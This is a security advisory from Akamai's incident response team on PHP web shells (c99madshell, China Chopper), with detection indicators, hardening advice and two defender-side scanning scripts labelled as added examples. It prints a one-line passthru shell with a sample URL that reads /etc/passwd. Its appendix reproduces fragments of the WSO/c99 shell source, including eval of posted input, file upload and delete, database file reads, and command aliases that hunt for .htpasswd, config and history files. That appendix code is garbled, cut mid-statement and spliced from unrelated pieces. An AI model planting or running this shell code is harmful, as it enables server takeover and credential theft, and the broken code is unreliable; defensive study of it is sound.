TLP Green: Recipients may share TLP: GREEN information with peers and partner organizations within their sector or community, but not via publicly accessible channels.
Page 1 of 35
Akamai Technologies, Inc. (TLP:Green) )
Web Shells, Backdoor Trojans and RATs
VERSION: 2013-0011
EXECUTIVE SUMMARY

A Web shell is executable code running on a server that gives an attacker remote access to functions of the server. A Web shell can also be seen as a type of Remote Access Tool (RAT) or backdoor Trojan file. Web shells can be written in any language that a server supports and some of the most common are PHP and .NET languages. These shells can be extremely small, needing only a single line of code, or can be full featured with thousands of lines. Some are self-sufficient and contain all needed functionality while others require external actions or a “Command and Control” (C&C) client for interaction.

Web shells are installed on a Web server through a compromise of some kind. The compromise could be through a legitimate Web application on the server using techniques like SQL injection, Remote File Inclusion, an unvalidated file upload feature or through a valid user’s stolen credentials. When the shell is installed, it will have the same permissions and abilities as the user who put it on the server.

To mitigate a Web shell infection, the server administrator will need to identify and delete the relevant files. This advisory does include a suggested WAF rule that will look for some of the signatures of common shells.
VULNERABILITY AND ATTACK DETAILS

A Web shell is a type of interface that allows a malicious user to bypass security controls and interact directly with the Web server and potentially the operating system itself. The shell may be a full-featured administrative GUI or as simple as a single line of code that simply takes commands through a browser’s URL field and passes them on to the back-end server.

A Simple Shell (Custom)

A PHP shell can be as simple as:
<?php passthru($_GET['x']); ?>

If an attacker can get this line of code into a file on the Web server that has PHP running and hasn’t blocked the passthru() function, he can then issue system commands through a browser. If this line is saved in a file named foo.php on the http://www.example.com Web site, he would issue commands through the PHP $_GET variable in the URL. Example:
http://www.example.com/file.php?x=cat%20%2Fetc%2Fpasswd

The PHP passthru function, or the similarly functioning eval(), exec() and system(), are functions that will take a string and send the string to the underlying system for processing. The above request will take the value of x, urldecode it and send the command: cat /etc/passwd to the operating system. If the file permissions allow it, the browser will then display the contents of the /etc/passwd file or any other file the attacker wishes to view. If the server is running PHP and doesn’t have a demonstrated need for the passthru, eval, exec or system functions, it would be wise to disable these, making it difficult for these shells to operate.

A Full-Featured Shell (c99madshell)

One of the most common PHP Web shells seen is the c99madshell. It is approximately 1,500 lines long and some of its features include displaying security measures the server may have in place, a file viewer that includes the files’ permissions, an area where the user can run custom PHP code on the server, and the contents of phpinfo(). Phpinfo() is a core PHP function that creates a Web page and outputs valuable information about the OS, Web server and PHP configurations. It also has the ability to search the server for configuration files, password files and other writeable files and directories. It also has tools built in to encode/decode strings from various formats as well as a bruteforce password cracker. It has a GUI to directly connect to a database server and if the attacker is concerned about detection, it has a function to self-delete the shell.

One of these shells can be installed through any of the same methods as described above: SQL injection, Remote File Inclusion, file upload functionality that doesn’t validate, or direct account access. When the file is installed by the attacker, it will often be installed with the Web server’s permission levels.
Any abilities that have been given to the Web server, including reading files outside the Web hierarchy or writing files, will also then be permitted to the attacker’s Web shell. Two valuable abilities for the attacker using this shell are searching the server and changing timestamps. Restricting the server’s find and touch binaries so the Web server user cannot execute them will severely hamper the attacker’s abilities on the server.
Sample code for this type of shell is included below in the Appendix.

Thick Client Shell

We have also seen a hybrid between the simple shell and the full-featured shell. Some shells have a type of command and control (C&C) structure. The attacker has their own local interface where they can simply type in the URL of a compromised machine and insert code similar to the simple shell. The benefit here is that the footprint on the infected server is extremely small, as small as 73 bytes, and doesn’t include code that is being picked up by anti-virus scanners. (http://www.fireeye.com/blog/technical/botnet-activities-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html) One such shell, named “China Chopper”, has been described as a single line of code inserted on a machine; from the remote client it then has capabilities including password brute-forcing, file management, database management and a virtual terminal. (http://www.fireeye.com/blog/technical/botnet-activities-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html)
HOW DO I KNOW I’M AFFECTED

Some of the signs that your site might be infected with a Web shell are periodic times of high site usage from search engines. One of the purposes of a Web shell is to spread malware or spam. Attackers have been known to use their shell to alter or create .htaccess files on a server that will funnel search engine requests to the pages with malware or spam. With enough of these shell infections, a site could eventually suffer a DoS attack from the search engine processes.

Due to their simplicity and acting like any other Web page, shells can be very stealthy on a server and be very difficult to detect. Some of the other things that can indicate the presence of a shell are files that seem out of place or have an unusual timestamp. While some attackers are extremely careful with their file names and timestamps, others do get careless and may give their shell an obvious name like “shell.php” or “file.php”. The timestamp may be a tip-off in that it may pre-date the server’s existence or have a different time than every other file in a directory when they all should match. A system administrator can also periodically do a search of all files in the web root hierarchy looking for the functions that a shell depends on, such as eval(), passthru(), exec() and system() if running PHP, or the equivalent in the supported languages.

Logs can also indicate there is a shell on a server and in use. Watch for unusual requests to files when the requests do not correlate or don’t make sense by protocol. A PDF or JPG file being called with GET parameters could be an indication the file extension is not accurate and that it is actually a Web shell. With WAF rules turned on and watching for characteristics of requests and responses with a shell, you can get an indication of a Web shell in use and determine its location on the server.
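A defender-side triage script covering two of the checks described in this advisory, the disable_functions advice from the attack-details section and the periodic search of the web root for eval(), passthru(), exec() and system() together with the odd-one-out timestamp check; this is an added example, not code from the advisory or from Akamai, and the web root, file names and php.ini excerpt it uses are constructed. It also encodes one caveat: eval() is a PHP language construct, so disable_functions cannot switch it off.

```python
import os
import re
import tempfile
from pathlib import Path

# Functions the advisory says shells depend on. eval() is a language construct,
# not a function, so disable_functions cannot switch it off; the other three can.
SHELL_CALL_RE = re.compile(r"\b(passthru|exec|system|eval)\s*\(", re.I)
DISABLEABLE = ("passthru", "exec", "system")
PHP_OPEN_RE = re.compile(r"<\?(?:php\b|=)", re.I)
NON_CODE_EXT = {".jpg", ".jpeg", ".png", ".gif", ".pdf", ".txt"}
SAMPLE_PHP_INI = """; constructed php.ini excerpt: exec/system disabled, passthru forgotten
expose_php = Off
disable_functions = exec,shell_exec, system
"""


def still_enabled(php_ini_text):
    """Return the disableable shell functions that php.ini leaves enabled."""
    disabled = set()
    for line in php_ini_text.splitlines():
        line = line.strip()
        if line.startswith(";") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        if key.strip() == "disable_functions":
            disabled = {v.strip().lower() for v in value.split(",") if v.strip()}
    return [f for f in DISABLEABLE if f not in disabled]


def scan_webroot(root):
    """Report files that call shell functions, hide PHP behind a non-code
    extension, or carry the odd-one-out timestamp in their directory."""
    root = Path(root)
    findings = []
    files = sorted(p for p in root.rglob("*") if p.is_file())
    for path in files:
        rel = path.relative_to(root).as_posix()
        text = path.read_text(errors="replace")
        calls = sorted({m.group(1).lower() for m in SHELL_CALL_RE.finditer(text)})
        if calls:
            findings.append((rel, "calls " + ",".join(calls)))
        if path.suffix.lower() in NON_CODE_EXT and PHP_OPEN_RE.search(text):
            findings.append((rel, "PHP code behind a non-code extension"))
    for directory in {p.parent for p in files}:
        siblings = [p for p in files if p.parent == directory]
        if len(siblings) < 3:
            continue
        by_minute = {}
        for p in siblings:
            by_minute.setdefault(int(p.stat().st_mtime) // 60, []).append(p)
        # every sibling shares one timestamp except a single file: flag that one
        if len(by_minute) == 2:
            for group in by_minute.values():
                if len(group) == 1:
                    rel = group[0].relative_to(root).as_posix()
                    findings.append((rel, "timestamp differs from every sibling"))
    return sorted(findings)


def build_sample_webroot():
    """Construct a throwaway web root: three legitimate files plus two planted."""
    root = Path(tempfile.mkdtemp(prefix="webroot-"))
    contents = {
        "index.php": "<?php echo 'Welcome'; ?>\n",
        "about.html": "<html><body>About us</body></html>\n",
        "contact.php": "<?php include 'header.php'; echo date('Y'); ?>\n",
        "file.php": "<?php passthru($_GET['x']); ?>\n",       # the advisory's one-liner
        "images/logo.jpg": "<?php eval($_POST['p1']); ?>\n",  # PHP hidden as an image
    }
    deployed = 1_370_000_000          # constructed "site went live" timestamp
    for name, body in contents.items():
        path = root / name
        path.parent.mkdir(parents=True, exist_ok=True)
        path.write_text(body)
        os.utime(path, (deployed, deployed))
    os.utime(root / "file.php", None)  # planted later: its timestamp stands out
    return root


if __name__ == "__main__":
    print("still enabled:", still_enabled(SAMPLE_PHP_INI))
    for finding in scan_webroot(build_sample_webroot()):
        print(finding)
```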
HOW DO I FIX THE PROBLEM

The main goal is to prevent a shell from getting on a server in the first place. The methods of infection include SQL injection and remote file inclusion through a vulnerable Web application. With frequent testing and monitoring, these vectors can be minimized.

For all types of shells, a search engine can be extremely helpful. Often, the shells will be used to spread malware onto a server and the search engines are able to see it. But some check the User-Agent and will display differently for a search engine spider than for a regular user. To find a shell, you may need to change your User-Agent to one of the search engine bots. Some browsers have plugins that allow you to easily switch a User-Agent. Once the shell is detected, simply delete the file from the server.

If a c99madshell does make its way onto the server, it may have certain characteristics when the remote client interacts with it. It may issue a GET request that includes the parameter “FilesMan”. In a response, it may include “WSO” in between the HTML <title></title> tags and may include an HTML form with a parameter of “name=mf”. Also, this shell includes a link for www.exploit-db.com. If there is no usual reason for your site to be a referrer to exploit-db.com, you can flag this as a possible shell detection. It would have a high potential for false positives if it is normal for users in your organization to go to the exploit-db.com site. Additionally, a custom rule can be created in WAF that would look for these in source, if the client does not feel they are normal and valid functions for the environment.

If a China Chopper shell does make its way onto the server, it may have certain characteristics when the remote client interacts with it. In a POST request, the client will include the content “FromBase64String” and include the parameter “z***” where the asterisks are numbers. It may include any number between 1 and 999 after the z.
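The request and response characteristics listed above (the FilesMan parameter, WSO in the title, the name=mf form, the exploit-db.com link, static files called with GET parameters, and the China Chopper POST carrying FromBase64String plus a z1 to z999 parameter) as matching logic run over constructed sample traffic; this is an added example, not Akamai's WAF rule or code from the advisory, and the URLs, parameters and page body in it are invented.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Extensions that should not be requested with GET parameters on a normal site.
STATIC_EXT = {"pdf", "jpg", "jpeg", "png", "gif"}
CHOPPER_PARAM_RE = re.compile(r"z\d{1,3}")
WSO_TITLE_RE = re.compile(r"<title>[^<]*\bWSO\b[^<]*</title>", re.I)
MF_FORM_RE = re.compile(r"""<form[^>]*\bname\s*=\s*["']?mf\b""", re.I)

# Constructed sample traffic for this example; none of it is a real capture.
SAMPLE_REQUESTS = [
    ("GET", "/about.html", ""),
    ("GET", "/images/logo.jpg?x=cat%20%2Fetc%2Fpasswd", ""),
    ("GET", "/blog/upload.php?a=FilesMan&c=%2Fvar%2Fwww", ""),
    ("POST", "/app/Default.aspx", "pw=FromBase64String&z1=Y29uc3RydWN0ZWQ%3D"),
    ("POST", "/app/login.php", "user=alice&z1=remember"),
]
SAMPLE_RESPONSE = (
    "<html><head><title>WSO 2.5</title></head><body>"
    "<form method=post name=mf><input name=a></form>"
    "<a href='http://www.exploit-db.com/'>exploits</a></body></html>"
)


def request_indicators(method, target, body=""):
    """Return the advisory's request-side indicators matched by one request."""
    hits = []
    parts = urlsplit(target)
    query = parse_qs(parts.query, keep_blank_values=True)
    names = set(query) | {v for values in query.values() for v in values}
    # c99madshell/WSO: a GET carrying the FilesMan action, as a key or a value
    if method == "GET" and "FilesMan" in names:
        hits.append("wso-filesman-parameter")
    # a PDF/JPG/... called with GET parameters: the extension may not be accurate
    ext = parts.path.rsplit("/", 1)[-1].rsplit(".", 1)[-1].lower()
    if parts.query and ext in STATIC_EXT:
        hits.append("static-file-with-query")
    # China Chopper: POST body containing FromBase64String plus a z1..z999 field
    if method == "POST" and "FromBase64String" in body:
        fields = parse_qs(body, keep_blank_values=True)
        if any(CHOPPER_PARAM_RE.fullmatch(k) and int(k[1:]) >= 1 for k in fields):
            hits.append("china-chopper-post")
    return hits


def response_indicators(html):
    """Return the advisory's response-side indicators found in a page body."""
    hits = []
    if WSO_TITLE_RE.search(html):
        hits.append("wso-title")
    if MF_FORM_RE.search(html):
        hits.append("mf-form")
    if "exploit-db.com" in html.lower():
        # high false-positive potential where staff legitimately visit that site
        hits.append("exploit-db-link")
    return hits


def triage(requests=SAMPLE_REQUESTS):
    """Return (method, target, indicators) for every request that matched."""
    flagged = []
    for method, target, body in requests:
        hits = request_indicators(method, target, body)
        if hits:
            flagged.append((method, target, hits))
    return flagged


if __name__ == "__main__":
    for item in triage():
        print(item)
    print(response_indicators(SAMPLE_RESPONSE))
```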
Set file permissions in a way that will limit the damage that an attacker can do. Be aware of which users should have access to which files and set the file permissions accordingly. Do not allow the Web server to read operating system configuration files. Specify which directories should allow file uploads and only those should allow the Web server to write into them. Make certain that files cannot be executed in that directory so if malicious code is uploaded, it can’t be run. No other files or directories should be writeable by the Web server.

The mod_security core rule set does include Rule ID 950922 Malicious_Software/Trojan which detects some Web shells. That rule can be modified to add additional shell signatures if needed. Many times, Web shells will set off WAF file inclusion (LFI or RFI) and command injection rules as they do maintenance on themselves. Starting from a WAF rule firing, look at other requests from the same source IP address, paying attention to the query string and looking for file inclusion or command injection.
REFERENCES & RELATED READING

China Chopper Part 1 – http://www.fireeye.com/blog/technical/botnet-activities-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html
China Chopper Part 2 – http://www.fireeye.com/blog/technical/botnet-activities-research/2013/08/breaking-down-the-china-chopper-web-shell-part-ii.html
Keith Tyler on China Chopper – http://informationonsecurity.blogspot.com/2012/11/china-chopper-webshell.html
ABOUT AKAMAI CSIRT

The Akamai Customer Security Incident Response Team (CSIRT) researches attack techniques and tools used to target our customers and develops the appropriate response, protecting customers from a wide variety of attacks ranging from login abuse to scrapers to data breaches to DNS hijacking to distributed denial of service. Its ultimate mission: keep customers safe. As part of that mission, Akamai CSIRT maintains close contact with peer organizations around the world, trains Akamai's PS and CCare to recognize and counter attacks from a wide range of adversaries, and keeps customers informed by issuing advisories, publishing threat intelligence and conducting briefings.
CONTACTS

Existing customers that desire additional information can contact Akamai directly through CCare at 1-877-4-AKATEC (US and Canada) or 617-444-4699 (International), their Engagement Manager, or their account team. Non-customers can submit inquiries through Akamai’s hotline at 1.877.425.2624, the contact form on our website at http://www.akamai.com/html/forms/sales_form.html, the chat function on our website at http://www.akamai.com/ or on Twitter @akamai.
APPENDIX

This is version 2.5 of a c99madshell. Also referred to as c99 or just madshell.

<?php
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
if($argc == 3) {
    $_POST = unserialize(base64_decode($argv[1]));
    $_SERVER = unserialize(base64_decode($argv[2]));
}
if(!empty($_SERVER['HTTP_USER_AGENT'])) {
    $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
    if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
        header('HTTP/1.0 404 Not Found');
        exit;
    }
}
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
@define('WSO_VERSION', '2.5');
if(get_magic_quotes_gpc()) {
    function WSOstripslashes($array) {
        return is_array($array) ? array_map('WSOstripslashes', $array) : stripslashes($array);
    }
);
else $aliases = array(
    "List dir" => "ls -lha",
    "list file attributes on a Linux second extended file system" => "lsattr -va",
    "show opened ports" => "netstat -an | grep -i listen",
    "process status" => "ps aux",
    "Find" => "",
    "find all suid files" => "find / -type f -perm -04000 -ls",
    "find suid files in current dir" => "find . -type f -perm -04000 -ls",
    "find all sgid files" => "find / -type f -perm -02000 -ls",
    "find sgid files in current dir" => "find . -type f -perm -02000 -ls",
    "find config.inc.php files" => "find / -type f -name config.inc.php",
    "find config* files" => "find / -type f -name \"config*\"",
    "find config* files in current dir" => "find . -type f -name \"config*\"",
    "find all writable folders and files" => "find / -perm -2 -ls",
    "find all writable folders and files in current dir" => "find . -perm -2 -ls",
    "find all service.pwd files" => "find / -type f -name service.pwd",
    "find service.pwd files in current dir" => "find . -type f -name service.pwd",
    "find all .htpasswd files" => "find / -type f -name .htpasswd",
    "find .htpasswd files in current dir" => "find . -type f -name .htpasswd",
    "find all .bash_history files" => "find / -type f -name .bash_history",
    "find .bash_history files in current dir" => "find . -type f -name .bash_history",
    "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc",
    "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc",
    "Locate" => "",
    "locate httpd.conf files" => "locate httpd.conf",
    "locate vhosts.conf files" => "locate vhosts.conf",
    "locate proftpd.conf files" => "locate proftpd.conf",
    "locate psybnc.conf files" => "locate psybnc.conf",
    "locate my.conf files" => "locate my.conf",
    "locate admin.php files" => "locate admin.php",
    "locate cfg.php files" => "locate cfg.php",
    "locate conf.php files" => "locate conf.php",
    "locate config.dat files" => "locate config.dat",
    "locate config.php files" => "locate config.php",
    "locate config.inc files" => "locate config.inc",
    "locate config.inc.php" => "locate config.inc.php",
    "locate config.default.php files" => "locate config.default.php",
    "locate config* files " => "locate config",
    "locate .conf files" => "locate '.conf'",
    "locate .pwd files" => "locate '.pwd'",
    "locate .sql files" => "locate '.sql'",
    "locate .htpasswd files" => "locate '.htpasswd'",
    "locate .bash_history files" => "locate '.bash_history'",
    "locate .mysql_history files" => "locate '.mysql_history'",
    "locate .fetchmailrc files" => "locate '.fetchmailrc'",
    "locate backup files" => "locate backup",
    "locate dump files" => "locate dump",
    "locate priv files" => "locate priv"
);
function wsoHeader() {
    if(empty($_POST['charset'])) $_POST['charset'] = $GLOBALS['default_charset'];
    global $color;
    echo "<html><head><meta http-equiv='Content-Type' content='text/html; charset=" . $_POST['charset'] . "'><title>" .
        eval($_POST['p1']);
        echo htmlspecialchars(ob_get_clean());
    }
    echo '</pre></div>';
    wsoFooter();
}
function actionFilesMan() {
    if (!empty ($_COOKIE['f'])) $_COOKIE['f'] = @unserialize($_COOKIE['f']);
    if(!empty($_POST['p1'])) {
        switch($_POST['p1']) {
            case 'uploadFile':
                if(!@move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name'])) echo "Can't upload file!";
                break;
            case 'mkdir':
                if(!@mkdir($_POST['p2'])) echo "Can't create new dir";
                break;
            case 'delete':
                function deleteDir($path) {
                    $path = (substr($path,-1)=='/') ? $path:$path.'/';
                    $dh = opendir($path);
                    while ( ($item = readdir($dh) ) !== false) {
                        $item = $path.$item;
                        if ( (basename($item) == "..") || (basename($item) == ".") ) continue;
                        $type = filetype($item);
                        if ($type == "dir") deleteDir($item);
                        else @unlink($item);
                    }
                    closedir($dh);
                    @rmdir($path);
                }
                if(is_array(@$_POST['f'])) foreach($_POST['f'] as $f) {
                    if($f == '..') continue;
                    $f = urldecode($f);
                    if(is_dir($f)) deleteDir($f);
                    else @unlink($f);
                }
                break;
            case 'paste':
                if($_COOKIE['act'] == 'copy') {
                    function copy_paste($c,$s,$d){
                        if(is_dir($c.$s)){
                            mkdir($d.$s);
                            $h = @opendir($c.$s);
                            while (($f = @readdir($h)) !== false) if (($f != ".") and ($f != ".."))
        $this->type = $type;
    }
    function connect($host, $user, $pass, $dbname){
        switch($this->type) {
            case 'mysql':
                if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true;
                break;
            case 'pgsql':
                $host = explode(':', $host);
                if(!$host[1]) $host[1]=5432;
                if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true;
                break;
        }
        return false;
    }
    function selectdb($db) {
        switch($this->type) {
            case 'mysql':
                if (@mysql_select_db($db))return true;
                break;
        }
        return false;
    }
    function query($str) {
        switch($this->type) {
            case 'mysql':
                return $this->res = @mysql_query($str);
                break;
            case 'pgsql':
                return $this->res = @pg_query($this->link,$str);
                break;
        }
        return false;
    }
    function fetch() {
        $res = func_num_args()?func_get_arg(0):$this->res;
        switch($this->type) {
            case 'mysql':
                return @mysql_fetch_assoc($res);
                break;
            case 'pgsql':
                return @pg_fetch_assoc($res);
                break;
        }
        return false;
    }
    function listDbs() {
        switch($this->type) {
            case 'mysql':
                return $this->query("SHOW databases");
                break;
            case 'pgsql':
                return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'");
                break;
        }
        return false;
    }
    function listTables() {
        switch($this->type) {
            case 'mysql':
                return $this->res = $this->query('SHOW TABLES');
                break;
            case 'pgsql':
                return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'");
                break;
        }
        return false;
    }
    function error() {
        switch($this->type) {
            case 'mysql':
                return @mysql_error();
                break;
            case 'pgsql':
                return @pg_last_error();
                break;
        }
        return false;
    }
    function setCharset($str) {
        switch($this->type) {
            case 'mysql':
                if(function_exists('mysql_set_charset')) return @mysql_set_charset($str, $this->link);
                else $this->query('SET CHARSET '.$str);
                break;
            case 'pgsql':
                return @pg_set_client_encoding($this->link, $str);
                break;
        }
        return false;
    }
    function loadFile($str) {
        switch($this->type) {
            case 'mysql':
                return $this->fetch($this->query("SELECT LOAD_FILE('".addslashes($str)."') as file"));
                break;
            case 'pgsql':
                $this->query("CREATE TABLE wso2(file text);COPY wso2 FROM '".addslashes($str)."';select file from wso2;");
                $r=array();
                while($i=$this->fetch()) $r[] = $i['file'];
                $this->query('drop table wso2');
                return array('file'=>implode("\n",$r));
                break;
        }
        return false;
    }
Akamai® is the leading cloud platform for helping enterprises provide secure, high-performing user experiences on any device, anywhere. At the core of the Company’s solutions is the Akamai Intelligent Platform™ providing extensive reach, coupled with unmatched reliability, security, visibility and expertise. Akamai removes the complexities of connecting the increasingly mobile world, supporting 24/7 consumer demand, and enabling enterprises to securely leverage the cloud. To learn more about how Akamai is accelerating the pace of innovation in a hyperconnected world, please visit www.akamai.com and follow @Akamai on Twitter.
Akamai Technologies, Inc.

U.S. Headquarters
8 Cambridge Center
Cambridge, MA 02142
Tel 617.444.3000
Fax 617.444.3001
U.S. toll-free 877.4AKAMAI
877.425.2624

International Offices
Unterfoehring, Germany
Paris, France
Milan, Italy
London, England
Madrid, Spain
Stockholm, Sweden
Bangalore, India
Sydney, Australia
Beijing, China
Tokyo, Japan
Seoul, Korea
Singapore

www.akamai.com